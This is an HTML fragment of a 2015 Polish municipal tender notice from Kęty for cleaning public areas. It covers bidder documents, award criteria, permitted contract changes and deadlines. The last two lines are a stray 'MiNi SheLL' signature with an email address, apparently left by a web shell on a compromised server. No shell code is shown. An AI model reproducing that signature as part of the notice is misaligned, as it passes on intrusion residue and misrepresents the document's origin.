<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający wymaga, aby w wykazie usług Wykonawca wykazał, iż wykonał co najmniej dwie usługi polegające na utrzymaniu w czystości terenów publicznych, wykonywania prac porządkowych o wartości nie mniejszej niż 100.000,00 zł dla każdej z usług;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy formularz oferty według wzoru stanowiącego załącznik nr 1 do SIWZ;
b)	wykaz części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom (jeżeli dotyczy) - druk wykazu ujęto w załączniku nr 5 do SIWZ;
c)	upoważnienie do sporządzenia i podpisania oferty, jej załączników oraz wszystkich oświadczeń 
i dokumentów, jeżeli ofertę podpisuje osoba upoważniona przez osobę lub osoby uprawnione do reprezentowania firmy w sposób określony w akcie rejestrowym.
Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać 
z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie. Wobec Wykonawcy będącego spółką cywilną dopuszcza się dołączenie umowy spółki cywilnej, z której będzie wynikać stosowne upoważnienie.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
Wymagania stawiane wykonawcom wspólnie ubiegającym się o udzielenie zamówienia:
1)	do oferty musi być dołączone stosowne pełnomocnictwo do reprezentowania Wykonawców 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników; Pełnomocnictwo może zostać przedłożone w formie oryginału lub kserokopii potwierdzonej notarialnie;
2)	w przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) lub przez spółkę cywilną, każdy ze wspólników konsorcjum lub spółki cywilnej zobowiązany jest dołączyć dokumenty wymienione w cz. VI  pkt. 2 SIWZ (lub w pkt 3 - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej). Pozostałe dokumenty będą traktowane jako wspólne.
Zgodnie z art. 23 ust. 4 ustawy Prawo zamówień Publicznych, jeżeli taka oferta zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz 
w przypadku gdy wykonawca polega na zasobach innych podmiotów, kopie dokumentów dotyczących odpowiednio wspólników konsorcjum lub tych podmiotów są poświadczane za zgodność z oryginałem przez wspólników konsorcjum (każdy w odniesieniu do dotyczących go dokumentów) lub przez pełnomocnika konsorcjum, jeżeli będzie miał do tej czynności upoważnienie, a w odniesieniu do innych podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy w odniesieniu do dotyczących go dokumentów). 
Dokumenty podmiotów zagranicznych 
1)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w cz. VI pkt 2 ppkt 2 SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymani w całości wykonania decyzji właściwego organu, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2)	Dokument, o którym mowa w cz. VI pkt 3, ppkt 1, lit. a) SIWZ, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w  pkt 3, ppkt 1, lit. b) nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3)	Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w cz. VI ppkt 3 lit. a i b SIWZ, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju  miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Przepis pkt 2 stosuje się odpowiednio.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin zapłaty faktur - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy 
w okolicznościach podanych poniżej:
1)	Zmiana terminu wykonania umowy może nastąpić w przypadku:
a)	wystąpienia siły wyższej, przez którą należy rozumieć zdarzenie bądź połączenie zdarzeń zewnętrznych, obiektywnie niezależnych od Zamawiającego lub Wykonawcy, które zasadniczo i istotnie uniemożliwiają wykonywanie części lub całości zobowiązań wynikających z Umowy, których nie można było przewidzieć i którym Zamawiający i/lub Wykonawca nie mogli zapobiec ani ich przezwyciężyć i im przeciwdziałać, 
b)	działania osób trzecich albo innych zdarzeń, które uniemożliwiają wykonanie części lub całości zobowiązań wynikających z Umowy w terminie lub mogących negatywnie wpływać na jakość wykonywanych prac, 
2)	Zmiana zakresu rzeczowego usług może nastąpić w przypadku:
a)	przejęcia w zarząd lub oddania innej jednostce części dróg, ulic, placów itp. podlegających utrzymaniu - zakres do 5% całości zakresu świadczonych usług nie podlega zmianie ceny; w przypadku zmiany wykraczającej ponad 5% zakresu, określona w ofercie cena zostanie przeliczona proporcjonalnie w zależności od zwiększenia lub zmniejszenia zakresu zamówienia,
b)	likwidacji lub rozwiązania firmy Wykonawcy
3)	Zmiana wynagrodzenia Wykonawcy (ceny podanej w ofercie) może nastąpić w przypadku: 
a)	zmiany stawek podatku VAT, 
b)	likwidacji lub rozwiązania firmy Wykonawcy
4)	Inne zmiany: 
a)	zmiany osób kluczowych biorących udział w realizacji przedmiotu umowy
b)	zmiany siedziby (adresu) Zamawiającego lub Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kety.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kęty, Rynek 7, 32-650 Kęty..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2015 godzina 09:45, miejsce: Urząd Gminy Kęty, Rynek 7, 32-650 Kęty, dziennik podawczy..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com